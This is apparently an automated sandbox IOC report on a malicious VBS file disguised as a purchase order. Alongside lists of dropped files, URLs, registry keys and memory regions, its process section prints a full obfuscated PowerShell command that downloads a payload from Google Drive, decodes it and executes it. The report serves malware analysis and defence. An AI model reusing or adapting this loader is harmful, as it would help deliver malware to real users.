IOC Report
BOLUDA CORPORACI#U00d3N MAR#U00cdTIMA, S.L. PEDIDO 268e44.vbs

loading gif

Files

File Path
Type
Category
Malicious
BOLUDA CORPORACI#U00d3N MAR#U00cdTIMA, S.L. PEDIDO 268e44.vbs
ASCII text, with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ik42faz4.rce.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ov434nxa.hxo.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Benzinforhandlers.xan
HTML document, ASCII text, with very long lines (1692), with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BOLUDA CORPORACI#U00d3N MAR#U00cdTIMA, S.L. PEDIDO 268e44.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Licence Skafotternes Brdlses Brnetestamente #>;$Cabrera='Glassenes';<#Jotting Slubbering Overfortolkningers Farvefjernsynene #>;$Bevaringsforanstaltning=$Uudgrundelig+$host.UI; function Osmate11($Samlets80){If ($Bevaringsforanstaltning) {$Unsavoredness++;}$Forblst=$Baktericide+$Samlets80.'Length'-$Unsavoredness; for( $Udstykningsomraadets=5;$Udstykningsomraadets -lt $Forblst;$Udstykningsomraadets+=6){$Skomagerdrengenes=$Udstykningsomraadets;$Daschagga+=$Samlets80[$Udstykningsomraadets];$Maurers='Dictyoceratine';}$Daschagga;}function Semicalcareous($Passionlessness){ . ($Duplicidentata) ($Passionlessness);}$fremstillingsevnen=Osmate11 'HakkeMUdsproStortz GalliUnclel Un elBenenaVrigh/Vasom ';$fremstillingsevnen+=Osmate11 'Rhi o5Anlgs. Habi0Sblad Lyrik( eetW,ndesiF ldlnNoterdOpsejoJehovwm,ness d bg CyrtoN ProvTUnwra T oto1sphen0Exter.Lymph0Hvine; Unaf AandeWBor.eiFor un edbu6Fllet4 esul;Nonsy Adipox Viln6F rma4Freja;Relie InterA trivIkld.: Ribe1Bffel3T.ran1Kobra.L.mai0 Mar )Ulvef Di opG.ncaneHoeincUnderkS,idso step/Bjerg2Huma 0 ilox1Forsi0Anhng0Un,am1 Gab.0Afdel1Fikt AnticFS.aabimadolrSysteeTaihofAmb yoTrestx unap/Nomar1T ppe3Minis1Kamos.me,er0Rean ';$Lingvisternes=Osmate11 'DukseU .oncSa.oeteUdlevrForli-Go daA linjGPr vlESepa.NMotorTTegng ';$Fordrvende=Osmate11 'Vask hCi.dat ventDiblap vandsDepla: Pres/ hets/foreodSaprorMa itiNo mavByggeem ste.SlatigHusgeoSibneo Reklg SatslNonfue strm.C.fffcbrouioCh,vamErsta/Pe.iouHidroc uffi?Faulte paraxAxonopGerero A.rarF rsktAnnas=Reg edSeedioViolawProgrn,turklsti lo BulmatilkbdLacor&Vap.riAnoind Gash=Tymba1GanglTDeleseKnudrJOldfrPLovtel ResntPantiNJongltepaulbOpal J sh,eE,fterIcompouMasseRErhveN VersZPo.no9GeratmBrnde2AfbetaAnnebUForl p BorgCThuriSNazir0 Te.elBlemoWindtjzFootbqSwimm0C ronD MystyEnter ';$sortsmusket=Osmate11 ',carp>Ligki ';$Duplicidentata=Osmate11 ' LeveiFattieVa thXKabin ';$Nasalises='Filamenterne';$Friktionskoefficienterne='\Benzinforhandlers.xan';Semicalcareous (Osmate11 ' T.pe$SlutngTrkulLBest,O GradbKra fAUnheaLcentr:Dis,uf UnhorBelfasoutnut Une.EGla ih ivena Re tainhibNHoarsdDiskesJ urnvSangeI,ysseDrhamnEAfskrnEffem9Orium3Circu=A.sac$FdseleOutwoN ebrV eten:C.ffea ubtrpRadioPBredbd Glyca IsocT ,lodaAng.e+ S,bs$PatenfchemorMiscoiJeeptKArbejtDis,riNonseoSynkrnOvermsSgnomKTrmanO SubvE,ibroFVedhnFReco ILinkbCbran.iIndehESuspeNTadestDomm,E kor rklammNData eHofna ');Semicalcareous (Osmate11 'gudma$ MulkGekstrLTrigooDuernbRasteAPseudLBetnk:ApostfBalstLBlandyTroj vMejeseD ivarL njeSTimonJSteenUDevi sErosisDiscuePeakbrDesp =Lib l$SammefEksamo .ennRHorrodFor erCyclovRadi,eFodbanA scidPredeEUlnne.SjklhSKallipHo lelBygrnI Ealdt kara(Nonab$ UnresU derOSpul,r TyvstTi,deSLaureM,onvouGemy.sHulebkMinveeT adit Mere)Alleg ');Semicalcareous (Osmate11 'Pleu,[Jor,fNTipssE Sk ltBrutt.CoiffS CancE E ecRHalvpVBidariF lmacbrutie uercpOvertOStinki nedln F rlTMegacMNe bjAS cioNKartoAFortrGVaagneDekstrOsteo] Sulf:Pound:Psychs GangE FaseCKulleuGruo.rdesmoiNrlsttaand,YF.reaP Suger UnenOUdkldTRu udoKompoc.rigsOgaruaLPleon s.mal=Chas Syste[Ful sNAf evEOvereTSubv..ShellSByrneeFiniccS,aftuTviv R tehuI HalvtIncavYK rosPMumblrGlot oDom,stf agmo,lloicBesvao Cry lSkdp,t eoxyUnmotpCleanEBambu]bus.e: Cong:Race,TOutflL S.atSSimpl1Eksot2Slvsn ');$Fordrvende=$Flyversjusser[0];$Filmatiserer=(Osmate11 'Raddl$QuillgOutsklPartioBolivbTenniaD vell konv:SubcrBForb oTaxeoN .lamA Tian=,tilnNTacitEPolarW ermi-KimmsONoe ebDodekjStatuERegarCpussytAdolp sko S ,manY TeatS bravT gramEOr.homEncep.RasteNKundeETeodot Bron. ipstWFhaarEOversbLetvgcMuldvlOvervI.rrinE coitN WivaTUdenl ');Semicalcareous ($Filmatiserer);Semicalcareous (Osmate11 ',loac$ Un oB uieto ercynenep aFeder. OocyHP.angeFralgaTak ld TaxieFoxharKildesNonre[ Retr$Po itLRackeiMtaalncoaptgCoenuv kateivokatsbaggrtPhooleUng irBolignPaatveDuplisSpgel]Syste=Knig.$ ProdfVallirSoutteUltramWhe ss SvejtBascui palel unpllComedi Forsn OvergBums sWindoeIsdanvAbbaynNaadle implnMosef ');$Flugtbilister=Osmate11 'sk le$ForurBDow sobra anevapoa Groe..nsinD.plysoDy,grwDe.obnBringl Hippo UphoaP oardsvanhF MonoiProctlbubalePa,dr(Ko if$Djve FChondoBillarForlgd Sty rknevlvRalleeUnhu nCoagudChriseHom.g, Khev$PreprC jorinon tsFemineDobbelLbeseuReengr Disse osmo1Mourn4Taels4Metat) Ef.e ';$Ciselure144=$Frstehaandsviden93;Semicalcareous (Osmate11 'Parfe$BilleGAkadeLUg deoNowhibSkod,AXmasbLAlkin:NonosFFe lbjple roBeedggEring3 Li h3Ruptu=Spand(QuadrTB.kegESfaersUnv ntFljls-mogssp HanhAPh.siTMarkeh bund Vask$ UdtrCMagtbiMonkfS nsaleSupe,lBac.sudo.jeROxyheeStudi1Gt el4 salg4Frok )Unpli ');while (!$Fjog33) {Semicalcareous (Osmate11 'Ndtvu$Dear.gOverelAcridocoo.obSmalfa A,myl Diss:Pu hfFFremmoRigorrRum,aeOm laiMatchgPneumn T tae PrverBillesSammehSyntaiP zazpAnl,s= skyg$ Clovt UdverCh rauSootpeDigox ') ;Semicalcareous $Flugtbilister;Semicalcareous (Osmate11 'BushgS StorTBijekaKoru,rUdsmutUnret- TrykSVarefLSumloE inteESnipePBrnds Celie4Faldg ');Semicalcareous (Osmate11 'Indga$QuadrgDampsLAdelaOJu.ulb Divea S,iblUnfl,:UlvanfCosigjC reboKapelgS,lgs3Conge3Indva=Aphid(S oppTDaaseECal.mSMethotGenne- Forcp FiscaMarmeTConfuH Betr U gra$Flo lcBloksiU,perS Ar eePladdLArecaUuk.lirS ottE F st1Mabes4Perg.4Stenv)M.ane ') ;Semicalcareous (Osmate11 ' Spek$ verrGBoderLCupstoSkjo,BSam ea lorcL Disk:AfsniNFlde ARegi,TU enli ColoOpun.tNMe acaEven LBjlkeSUnp aO.ngakC ,okliDobbeaWhin LSk alISubjeS Banit UnabE QuerRhustrnUt ttereaffSDoc e1Boiss8Intim5Diaph=Bravu$FigurG KremLBagueOFiremBcalmaADeposL H pn:SejrraOve,dnHugenNa herU MotoLGa,pllPodicAhypertIconveCharm+Ba,df+ Atte%Boe t$La abfUnwe.lCar.oy BigavUmbereBiblir KvarsInterj MhorUXylots rakSFootge,ahinRSnirk.noedvcPenlooGeninuCapriN obbotF dig ') ;$Fordrvende=$Flyversjusser[$Nationalsocialisternes185];}$Cruellest=298454;$Gerri=31481;Semicalcareous (Osmate11 'Gagen$HyrekgAngi LT lefOunnotbFr dsAunpasLDiano:Dity P Vaera onogRVoldtAsipidLE.okiLTeleoEE srelBarraiB,jdsz FlydI Usvkntrig,gOverl P osp=Ins i atchg PipieSpo.vTOveri-LigniCW hluoKnotlNUnc utFadebELigulN UndiTTekni Jarvy$slapdCUnoveiEnligsKanoneFingelEvangUMonopRArc,eEKola 1T avs4pro.r4kefti ');Semicalcareous (Osmate11 'Haren$ResidgStaggl ,humoRedifb StitaStbollSporo:Uld,aM rredeEmetosFla,so Ub,sc ForfeSysilpDistihLeukoaSp inlNem.ri .ewrsKla smForla Highb=Uny,l Nonpe[AnkomSLiq eyRegios EstetForaneAquatmmikro.stukkCun,nvo metrnOptllvCubaseMa,kerFortit Pala] orta:S egr:BatfiFV ljerBedstoSkorzmstyr.B KuanaVe kos U iveenean6Hulki4UrimeSPagintcinchrIndhoiAg flnSesamgPty l(E top$ Abo.PAlebeaSnebrrIsoniaAmbullNar olEn eleInradlGaaseiByronzUnvoli LibonNew pgOutri) ksp ');Semicalcareous (Osmate11 'Tonef$TribugFuldslG neroInterB RavnAParliLRette:El ctsLovbrk LukkaIndusAUnpron Eft SNusseeSkoleLIns.rs optrLTurb,S palaePsiloRinforeSeaf Allo =Nonc, Numme[BespasOutthyChippsGearvtTi sye Sta mAntip.Eddist BetjEAfstixTintotSharr. Outne bolinHilahcD,magO ealiDHurinIMarg.NSparkgBndel]mercu: Ch o:SayabAJuvenSRumfrcTysklIG ltyITendi.FairegFusleESamdrtS nkrsRygeatUlykkrFlyveI Anc N AlthGSwing(Sel.r$ha inMBethleOvermS O phoMikroc PassE VernPRecocH SeraaInnatl Ter,IPlatySultr mSting) Bl,t ');Semicalcareous (Osmate11 'Adeno$VandbgEhre LAffotoGidsebLykkeaP esslBagag:NulleaR.empn BaneTfogedESuperGCelluN pponi Dri NAchaeg.iploe LyncR.erraNPresteUnpo =Purdu$ rawls C leK rammADissea.evolNIndhySDetacEO.istlRekruSSnoreLloddesSempleHandsRS,jdmE Eyne.CanthsVvni u Famib I prsDagblTFolioR yllaISttedn Fol G rgot(stu i$ExtraCCheerRP omiU Li aeU,memLU.vejl OrthE TimeS ensiTTeg,e, Yuck$ForkoG eserESkattrGa.anR NundIMoe,t)Butto ');Semicalcareous $Antegningerne;"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

URLs

Name
IP
Malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
malicious
https://go.micro
unknown
malicious
https://github.com/Pester/Pester
unknown
malicious
https://www.google.com
unknown
http://nuget.org/NuGet.exe
unknown
http://drive.usercontent.google.com
unknown
https://drive.googPzm
unknown
https://drive.usercontent.googhko
unknown
https://contoso.com/
unknown
https://drive.usercontent.google.comD=620
unknown
https://nuget.org/nuget.exe
unknown
https://contoso.com/License
unknown
https://contoso.com/Icon
unknown
https://drive.google.com
unknown
https://drive.usercontent.google.com
unknown
https://drive.googPb
unknown
http://drive.google.com
unknown
https://aka.ms/pscore68
unknown
https://apis.google.com
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
There are 11 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
drive.google.com
142.250.185.206
drive.usercontent.google.com
142.250.185.65

IPs

IP
Domain
Country
Malicious
142.250.185.206
drive.google.com
United States
142.250.185.65
drive.usercontent.google.com
United States

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
There are 4 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
1400DC05000
heap
page read and write
1400DC0E000
heap
page read and write
1400BC85000
heap
page read and write
1400BC4D000
heap
page read and write
1400E241000
heap
page read and write
200F5FE000
stack
page read and write
7FFB4AC70000
trusted library allocation
page read and write
1E9B2206000
heap
page read and write
1E9B24AF000
heap
page read and write
1E998310000
heap
page read and write
1400BCB3000
heap
page read and write
1400BBEB000
heap
page read and write
1400BCD0000
heap
page read and write
1400E240000
heap
page read and write
1400BC6A000
heap
page read and write
1E99BBD6000
trusted library allocation
page read and write
1400DC0D000
heap
page read and write
1E998314000
heap
page read and write
1E99BAAA000
trusted library allocation
page read and write
1400BC48000
heap
page read and write
7FFB4ACA0000
trusted library allocation
page read and write
1400DC03000
heap
page read and write
1E9982AA000
heap
page read and write
1E99A1DD000
trusted library allocation
page read and write
1E99A1C8000
trusted library allocation
page read and write
7FFB4AA80000
trusted library allocation
page read and write
1400DC07000
heap
page read and write
1E9B2498000
heap
page read and write
1E998397000
heap
page read and write
1E999F57000
trusted library allocation
page read and write
7FFB4AB56000
trusted library allocation
page execute and read and write
1400DC83000
heap
page read and write
1E998290000
trusted library allocation
page read and write
1400BC45000
heap
page read and write
1400DC00000
heap
page read and write
7FFB4ACD0000
trusted library allocation
page read and write
1E999DB1000
trusted library allocation
page read and write
1400DD0B000
heap
page read and write
1400DC0D000
heap
page read and write
4C5CE7E000
stack
page read and write
1400BDD0000
heap
page read and write
1400BC2E000
heap
page read and write
7FFB4AC40000
trusted library allocation
page execute and read and write
1E9B2376000
heap
page execute and read and write
4C5CD78000
stack
page read and write
1400BC85000
heap
page read and write
4C5CA7E000
stack
page read and write
1400BC67000
heap
page read and write
1E9B222B000
heap
page read and write
1E9982C0000
heap
page read and write
1400DC83000
heap
page read and write
1E9B2280000
heap
page execute and read and write
1400DC4C000
heap
page read and write
7FFB4AA7D000
trusted library allocation
page execute and read and write
4C5CC77000
stack
page read and write
1E99B378000
trusted library allocation
page read and write
1400DC32000
heap
page read and write
1400DC02000
heap
page read and write
4C5CB7E000
stack
page read and write
200FCFB000
stack
page read and write
1400BC44000
heap
page read and write
1400DC02000
heap
page read and write
1400BC66000
heap
page read and write
4C5CDFE000
stack
page read and write
7FFB4ADD0000
trusted library allocation
page read and write
7FFB4AD00000
trusted library allocation
page read and write
1E9983A1000
heap
page read and write
1400DE11000
heap
page read and write
7FFB4AC60000
trusted library allocation
page execute and read and write
1400DC83000
heap
page read and write
7FFB4ACE0000
trusted library allocation
page read and write
7FFB4ADA0000
trusted library allocation
page read and write
7FFB4AC52000
trusted library allocation
page read and write
1400DC83000
heap
page read and write
1400DC01000
heap
page read and write
1400BC7F000
heap
page read and write
200F8FE000
stack
page read and write
7FFB4ADC0000
trusted library allocation
page read and write
7FFB4AB26000
trusted library allocation
page read and write
1E998308000
heap
page read and write
1E998393000
heap
page read and write
4C5CCF9000
stack
page read and write
4C5DACD000
stack
page read and write
1400BC16000
heap
page read and write
1E99BAAF000
trusted library allocation
page read and write
1400BE50000
heap
page read and write
1E9982B0000
heap
page read and write
7FFB4AB20000
trusted library allocation
page read and write
1400DC1C000
heap
page read and write
1E9B220E000
heap
page read and write
1400DC09000
heap
page read and write
1400BC34000
heap
page read and write
1E99A35A000
trusted library allocation
page read and write
1400BBEA000
heap
page read and write
1E998230000
heap
page read and write
1400DC17000
heap
page read and write
7FFB4AB2C000
trusted library allocation
page execute and read and write
1400DC0D000
heap
page read and write
7FFB4AC80000
trusted library allocation
page read and write
7FFB4AA73000
trusted library allocation
page execute and read and write
1400DC2A000
heap
page read and write
1E9AA027000
trusted library allocation
page read and write
1400BC25000
heap
page read and write
1E9B2511000
heap
page read and write
7FFB4AC90000
trusted library allocation
page read and write
1E9B24E1000
heap
page read and write
7FFB4AD80000
trusted library allocation
page read and write
7FFB4AD90000
trusted library allocation
page read and write
1400DC83000
heap
page read and write
1E99A29B000
trusted library allocation
page read and write
1400DC83000
heap
page read and write
7FFB4AC10000
trusted library allocation
page read and write
1400BC31000
heap
page read and write
1400BF60000
heap
page read and write
1E998270000
trusted library allocation
page read and write
1E99A2D8000
trusted library allocation
page read and write
1400DC83000
heap
page read and write
7DF3FF140000
trusted library allocation
page execute and read and write
1E998399000
heap
page read and write
1400DC04000
heap
page read and write
4C5DA4C000
stack
page read and write
1E99BEDA000
trusted library allocation
page read and write
1E99BF44000
trusted library allocation
page read and write
4C5CAFE000
stack
page read and write
1400DC83000
heap
page read and write
1E9B2198000
heap
page read and write
1E9B2370000
heap
page execute and read and write
1400DC83000
heap
page read and write
1400BC59000
heap
page read and write
1400BC27000
heap
page read and write
7FFB4AD50000
trusted library allocation
page read and write
4C5C533000
stack
page read and write
1400BC6A000
heap
page read and write
1400BC29000
heap
page read and write
1400BBC0000
heap
page read and write
1400BC34000
heap
page read and write
7FFB4ACB0000
trusted library allocation
page read and write
7FFB4AB90000
trusted library allocation
page execute and read and write
1400DC83000
heap
page read and write
1E9B218C000
heap
page read and write
1E998550000
heap
page readonly
1E9B2480000
heap
page read and write
7FFB4AD60000
trusted library allocation
page read and write
1400DC84000
heap
page read and write
1E998305000
heap
page read and write
1400DC41000
heap
page read and write
7FFB4AC21000
trusted library allocation
page read and write
1E99BAC4000
trusted library allocation
page read and write
1400DC83000
heap
page read and write
1400BC62000
heap
page read and write
1400BC25000
heap
page read and write
4C5CF7E000
stack
page read and write
7FFB4AD40000
trusted library allocation
page read and write
200F3FE000
stack
page read and write
1400BC85000
heap
page read and write
1400DC07000
heap
page read and write
200F2FE000
stack
page read and write
200F9FE000
stack
page read and write
1E999D31000
trusted library allocation
page read and write
4C5D9CE000
stack
page read and write
4C5CBF7000
stack
page read and write
1400BC85000
heap
page read and write
7FFB4AD30000
trusted library allocation
page read and write
1E99A1C4000
trusted library allocation
page read and write
1E998560000
trusted library allocation
page read and write
1E99BAE8000
trusted library allocation
page read and write
1400DC3E000
heap
page read and write
1E99A65F000
trusted library allocation
page read and write
7FFB4AA90000
trusted library allocation
page read and write
1E99BAD0000
trusted library allocation
page read and write
1E9B2330000
heap
page read and write
1400BC2A000
heap
page read and write
1E99834E000
heap
page read and write
1400BC8F000
heap
page read and write
1400BC40000
heap
page read and write
1E9B24B3000
heap
page read and write
1400DC0D000
heap
page read and write
1E99A2DC000
trusted library allocation
page read and write
1400DC0A000
heap
page read and write
7FFB4ADB0000
trusted library allocation
page read and write
1400BC16000
heap
page read and write
1400DFCA000
heap
page read and write
4C5C87E000
stack
page read and write
1E9B2380000
heap
page read and write
1E99B05F000
trusted library allocation
page read and write
1400DC22000
heap
page read and write
1400BDB0000
heap
page read and write
7FFB4ACF0000
trusted library allocation
page read and write
1E9B253B000
heap
page read and write
7FFB4AA74000
trusted library allocation
page read and write
1400BC2E000
heap
page read and write
1400BC8C000
heap
page read and write
1E99A5F6000
trusted library allocation
page read and write
4C5CEFE000
stack
page read and write
1400DC83000
heap
page read and write
200EF8A000
stack
page read and write
1E99BACC000
trusted library allocation
page read and write
1400DC25000
heap
page read and write
1400DAF2000
heap
page read and write
1E9B1D34000
heap
page read and write
1E9980F0000
heap
page read and write
1400BBF0000
heap
page read and write
1E9A9D9E000
trusted library allocation
page read and write
1E9981D0000
heap
page read and write
1E9982CE000
heap
page read and write
1E999BC0000
trusted library allocation
page read and write
7FFB4AD70000
trusted library allocation
page read and write
7FFB4AA8B000
trusted library allocation
page read and write
1E99A1CC000
trusted library allocation
page read and write
1E99BF1C000
trusted library allocation
page read and write
7FFB4AC30000
trusted library allocation
page execute and read and write
1E99BAC1000
trusted library allocation
page read and write
1400DC83000
heap
page read and write
1400BC7F000
heap
page read and write
1400DC35000
heap
page read and write
1400BBF0000
heap
page read and write
7FFB4ADF0000
trusted library allocation
page read and write
1400BC5B000
heap
page read and write
200F7FE000
stack
page read and write
7FFB4AD10000
trusted library allocation
page read and write
1E998326000
heap
page read and write
1E9981F0000
heap
page read and write
1E99A1B9000
trusted library allocation
page read and write
4C5CFFB000
stack
page read and write
1400BC7F000
heap
page read and write
1E99B9FD000
trusted library allocation
page read and write
4C5C5FE000
stack
page read and write
1E9A9EE1000
trusted library allocation
page read and write
4C5C8FE000
stack
page read and write
1E99BF17000
trusted library allocation
page read and write
1400DC83000
heap
page read and write
1400BC48000
heap
page read and write
1400BC5B000
heap
page read and write
1400DC12000
heap
page read and write
7FFB4ACC0000
trusted library allocation
page read and write
1400DC46000
heap
page read and write
4C5C97E000
stack
page read and write
1E99A379000
trusted library allocation
page read and write
1E9B23A3000
heap
page read and write
1400DC83000
heap
page read and write
1E9985A0000
heap
page read and write
1400DC35000
heap
page read and write
1400BC34000
heap
page read and write
1400BBE9000
heap
page read and write
1400BC4A000
heap
page read and write
1400BBC9000
heap
page read and write
1E999D20000
heap
page execute and read and write
1400DC2E000
heap
page read and write
1400BC2E000
heap
page read and write
1400BC7F000
heap
page read and write
7FFB4ADE0000
trusted library allocation
page read and write
1400DC83000
heap
page read and write
1400DD07000
heap
page read and write
1E9B21D8000
heap
page read and write
7FFB4AC2A000
trusted library allocation
page read and write
1400DE25000
heap
page read and write
1400DC06000
heap
page read and write
7FFB4AACC000
trusted library allocation
page execute and read and write
7FFB4AA72000
trusted library allocation
page read and write
1400BC5C000
heap
page read and write
1E9A9D31000
trusted library allocation
page read and write
1E9B2180000
heap
page read and write
1400BBEC000
heap
page read and write
7FFB4AD20000
trusted library allocation
page read and write
1E99A1AF000
trusted library allocation
page read and write
1400BC85000
heap
page read and write
1400DC83000
heap
page read and write
1400BC6A000
heap
page read and write
1E9AA019000
trusted library allocation
page read and write
1E9982B5000
heap
page read and write
1400BC62000
heap
page read and write
4C5C9FC000
stack
page read and write
1400DC3A000
heap
page read and write
1400BCA9000
heap
page read and write
1E9982A0000
heap
page read and write
7FFB4AA70000
trusted library allocation
page read and write
200F6FE000
stack
page read and write
1E9985A5000
heap
page read and write
1E9B24B7000
heap
page read and write
200FBFE000
stack
page read and write
1E99BAD4000
trusted library allocation
page read and write
1E9B24BF000
heap
page read and write
1400BC7F000
heap
page read and write
1400BC50000
heap
page read and write
1E999BF0000
trusted library allocation
page read and write
1400DC0F000
heap
page read and write
1E9B21D6000
heap
page read and write
1E9A9D41000
trusted library allocation
page read and write
4C5C5BE000
stack
page read and write
1400BF65000
heap
page read and write
1E9B2830000
heap
page read and write
1400DC1D000
heap
page read and write
1400BC2C000
heap
page read and write
1E9B23A6000
heap
page read and write
There are 284 hidden memdumps, click here to show them.